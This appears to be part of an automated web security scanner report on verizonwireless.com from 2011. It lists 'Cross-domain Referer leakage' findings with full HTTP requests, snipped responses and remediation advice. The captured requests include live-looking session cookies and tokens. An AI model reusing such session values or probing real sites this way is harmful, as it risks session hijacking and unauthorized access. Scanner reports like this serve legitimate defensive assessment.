X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 439

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 9 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.verizonwireless.com/b2c/dispatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/dispatcher

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/dispatcher?action=DISPLAY&item=_STORE_SEARCH&CURRENT_TYPE_LABEL=All%20Stores&zipCode=10010 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/dispatcher
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312204334|session#1310993870949-319721#1310996594|check#true#1310994794; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:15:45 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 55260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


               <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="left" style="width:26px;">
                           
                               <img src="http://cache.vzw.com/images_b2c/store_locator/storeLocatorStore.gif" alt="" />
                           
                           
                       </div>
...[SNIP]...
<div class="left">
                                   <img src="http://cache.vzw.com/images_b2c/store_locator/technicianOnSite.png" alt="Technician On Site" />
                               </div>
...[SNIP]...
<div class="left" style="width:26px;">
                           
                               <img src="http://cache.vzw.com/images_b2c/store_locator/storeLocatorStore.gif" alt="" />
                           
                           
                       </div>
...[SNIP]...
<div class="left" style="width:26px;">
                           
                               <img src="http://cache.vzw.com/images_b2c/store_locator/storeLocatorStore.gif" alt="" />
                           
                           
                       </div>
...[SNIP]...
<div class="left">
                                   <img src="http://cache.vzw.com/images_b2c/store_locator/spanishSpeaking.png" alt="Hablamos Espanol" />
                               </div>
...[SNIP]...
<div class="left">
                                   <img src="http://cache.vzw.com/images_b2c/store_locator/technicianOnSite.png" alt="Technician On Site" />
                               </div>
...[SNIP]...
<noscript>
           <img src="https://ad.doubleclick.net/activity;src=685973;type=store781;cat=store357;ord=1?" width="1" height="1" alt="" />
       </noscript>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

3.2. http://www.verizonwireless.com/b2c/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/index.html?tab=myaccount HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203693|session#1310993870949-319721#1310995953|check#true#1310994153; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:11:19 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->

   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/homepage.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


   <link rel="stylesheet" type="text/css" media="all" href="http://cache.vzw.com/stylesheets/homepage/vzwCarousel.css" />

   
                               <script type="text/javascript">
...[SNIP]...
</a>
       <a href="http://community.vzw.com/" id="sForums">
           <script type="text/javascript">
...[SNIP]...
</span>


                                                                       <a href="http://support.vzw.com/splash/collateraldownload.html">Brochures</a>
...[SNIP]...
</span>
           <a href="http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx">Business</a>
...[SNIP]...
</span>
           <a href="http://www.vzwcareers.com/">Careers</a>
...[SNIP]...
</span>
           <a href="http://aboutus.vzw.com/accessibility/index.html">Accessibility</a>
...[SNIP]...
</span>
           <a href="http://www.verizonwireless-opendevelopment.com">Open Development</a>
...[SNIP]...
</span>
           <a href="http://www.lte.vzw.com">LTE Innovation Center</a>
...[SNIP]...
</span>
           <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
<div style="padding-top:5px;">
               <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
</span>
               
               
                   <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
               <a href="http://aboutus.vzw.com/Corporate_Responsibility/Corporate_Responsibility.html">Corporate Responsibility </a>
...[SNIP]...
</span>
               <a href="http://aboutus.vzw.com/wirelessissues/radioEmissions.html">Radio Frequency Emissions</a>
...[SNIP]...
</span>
               
                   <a href="http://aboutus.vzw.com/wirelessissues/avoidpotentialhearingloss.html">Avoid Potential Hearing Loss</a>
...[SNIP]...
</span>
               
               <a href="http://aboutus.vzw.com/wirelessissues/driving.html">Drive Responsibly</a>
...[SNIP]...
</span>
               <a href="http://community.vzw.com">Verizon Wireless Community</a>
...[SNIP]...
</span>
               <a href="http://www.droiddoes.com">Droid Does</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://files.ctia.org/pdf/The_Code.pdf"><img src="http://cache.vzw.com/images_b2c/shared/nav/ctia_seal.gif" width="64" height="62" alt="Consumer Information Code" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
<div>
           <iframe src="https://fls.doubleclick.net/activityi;src=685973;type=veriz351;cat=vzwmy324;ord=1?" title="" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</noscript>
   

       <script src="http://cache.vzw.com/scripts/homepage/vzwCarousel.js" type="text/javascript"></script>
...[SNIP]...

3.3. http://www.verizonwireless.com/b2c/shoppingAssistant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/shoppingAssistant

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/shoppingAssistant?step=shoppingAssistant&item=phoneFirst&displayText=Phone&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=5632&quantity=1&hasMultipleAssociatedSimTOs=false&closeUrl=/b2c/store/controller%3Fitem%3DphoneFirst%26action%3DviewPhoneOverviewByDevice%26backTo%3Dtrue
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312206231|session#1310993870949-319721#1310998491|check#true#1310996691; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmc=96859928; chkcookie=1310993892258; ZIPCODE=10010; CITY=New York; STATE=NY; devicePageView=list

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:43:50 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 15015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Main JSP for the new shopping Assistant -->


<html xmlns="http://www.w3.org/1
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://cache.vzw.com/dwr/util.js'></script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
<div class="leftAligned" style="width:55px;">
   <img alt="Verizon Wireless 4G LTE USB Modem 551L" src="http://cache.vzw.com/images_b2c/phones/mini/vzw_lte_usb_551l_modem.png" class="mini" />
</div>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js"></script>
...[SNIP]...

3.4. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635 HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258; CARTVIEW=FALSE; ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 18 Jul 2011 13:01:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 61973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-u
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-07" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-07" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-07" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-07"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


       <script type="text/javascript" src="http://cache.vzw.com/dwr/dwrUtil.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/dwr/util.js"></script>
...[SNIP]...
<div id="flashDemo"><img src="http://cache.vzw.com/images_b2c/phones/lg/htc_trophy.png" alt="" class="large" /></div>
...[SNIP]...
<div class="left">
                                   <img src="http://cache.vzw.com/images_b2c/mediagallery/exploreFeatures.gif" alt="Explore Features" style="width:30px; height:30px;" />
                               </div>
...[SNIP]...
<div class="left">
                                   <img src="http://cache.vzw.com/images_b2c/mediagallery/guidedTour.gif" alt="Learn About Messaging" style="width:30px; height:30px;" />
                               </div>
...[SNIP]...
<div class="left">
                                   <img src="http://cache.vzw.com/images_b2c/mediagallery/network.gif" alt="Network" style="width:30px; height:30px;" />
                               </div>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/trade_in_program.png" alt="Trade&ndash;In Program" />
                       
                       </div>
...[SNIP]...
</div>

                               
                                                                                                                               <a name="&lid=Trade&amp;ndash;In Program" href="http://www.trade-in.vzw.com" title="Details" class="boldLink">Details</a>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/20percent_off_accessories.png" alt="Up to 25% off Accessories" />
                       
                       </div>
...[SNIP]...
<div class="left">

                           <img src="http://cache.vzw.com/images_b2c/hot_deals/splash_images/free_act_special.png" alt="Free Activation" />
                       
                       </div>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
